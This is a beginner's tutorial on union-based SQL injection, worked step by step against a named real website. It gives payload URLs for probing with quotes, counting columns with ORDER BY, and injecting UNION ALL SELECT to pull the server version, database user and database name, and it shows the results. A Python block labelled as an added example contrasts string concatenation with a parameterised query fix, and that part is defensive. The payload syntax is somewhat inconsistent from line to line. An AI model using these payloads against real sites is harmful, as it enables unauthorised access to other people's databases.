Basic part of SQLi, in practice



Hello Guyzzz

Only for educational purposes.

Let me introduce myself.

I'm Adesh Kolte and I'm from India.

This is my first tutorial on basic SQL injection.

This is a basic tutorial, so it will be a little lengthy; be patient while watching.

I'm not discussing any theory regarding SQL injection, so I recommend reading some articles about SQL database structure and the backend process of SQL injection to understand SQL injection in a better way. I'm discussing only the practical part.

Before starting injecting, download the following tool from Google:

=> HackBar add-on or rootkajji add-on for Mozilla Firefox.

OK, let's start with basic  based SQL injection.





site>  http://greenwall.org/recent-news.php?id=16

We can check whether the site is vulnerable to SQL injection by putting a single quote (') or a backslash (\) after the parameter [id=2]. Let's try it on a site:



http://greenwall.org/recent-news.php?id=16 '




We got the following error:





=> check the manual that corresponds to your MySQL server version for the right syntax to use near ''-- -' at line 1

That means this site is vulnerable to SQL injection.

Sometimes, even if the site doesn't show this error, there is a chance of an SQL injection vulnerability.

In such cases, how can we know whether our target site is vulnerable or not?

Observe the site's behaviour: when you put a single quote or backslash (\) after the parameter (id=2'), you may observe that some content is missing from the page or that something on the page doesn't load normally. That also means our target site is vulnerable to SQL injection.

OK, let's continue with our injection.





 http://greenwall.org/recent-news.php?id=16 '





We got an SQL error.

First of all, we have to fix the query before we go further.

(Fixing the query is nothing but making the site load normally without any error.)

Usually we use -- in integer-based injection to fix the query.



http://greenwall.org/recent-news.php?id='16 '--+ (error fixed)







So we can continue to the next part, which is finding the number of columns in the site.

There are many methods for finding the number of columns; for now I'm showing only 2 methods.

One with order by and the other with group by.



1. order by



http://greenwall.org/recent-news.php?id='16 ' order by 100--+



We got the following error:



Query failed: blank some text missing



http://greenwall.org/recent-news.php?id='16 ' order by 16--+

It means the site has less than 16 columns.

Now we have to use a UNION statement to find the vulnerable columns.



http://greenwall.org/recent-news.php?id='16 '+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- -



You can see the numbers 3 and 4 on the page (the vulnerable columns).

Now we can get everything from these vulnerable columns.

Let's get some basic information.

Note:

1. version() or @@version => to display the version of the server

2. user() or @@user => to display the username of the site

OK, let's get them one by one.





http://greenwall.org/recent-news.php?id='16 '+UNION+ALL+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16-- -



result on web page => 5.6.29



http://greenwall.org/recent-news.php?id='16 '+UNION+ALL+SELECT+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16-- -



result => green62_view@localhost







http://greenwall.org/recent-news.php?id='16 '+UNION+ALL+SELECT+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16-- -



result => green62_site
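
Why the page reacts to these inputs, and the server-side fix, as an added example that is not part of the original tutorial or the site's own code. It assumes an in-memory SQLite database instead of the site's MySQL, a constructed 3-column `news` table, and hypothetical handler names `fetch_vulnerable` and `fetch_hardened`.

```python
import re
import sqlite3

def make_db():
    """Constructed sample data: a 3-column news table in in-memory SQLite (assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.execute("INSERT INTO news VALUES (16, 'Recent news', 'Body text')")
    return db

def fetch_vulnerable(db, raw_id):
    """Hypothetical handler: concatenates the id into the SQL text, so it is parsed as SQL."""
    sql = "SELECT id, title, body FROM news WHERE id = " + raw_id
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "SQL error: " + str(exc)  # what the visitor sees as a broken page

def fetch_hardened(db, raw_id):
    """Hypothetical fix: accept only a plain integer and bind it as a parameter."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []  # a quote, ORDER BY or UNION never reaches the database
    return db.execute(
        "SELECT id, title, body FROM news WHERE id = ?", (int(raw_id),)
    ).fetchall()

# The tutorial's inputs, adapted to the 3-column sample table
PROBES = ["16", "16'", "16 order by 100-- ", "16 order by 3-- ",
          "16 UNION ALL SELECT 1,2,3-- "]

if __name__ == "__main__":
    db = make_db()
    for probe in PROBES:
        print(repr(probe))
        print("  concatenated:", fetch_vulnerable(db, probe))
        print("  bound param :", fetch_hardened(db, probe))
```

On a PHP/MySQL site the equivalent fix is a prepared statement (PDO or mysqli) for every query that takes request input, together with not showing database error messages to visitors.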





That's all for this tutorial.

Enjoy

tutorial by Adesh kolte

Video tutorial

Basic part of sqli

https://youtu.be/A-EYrT3i_v0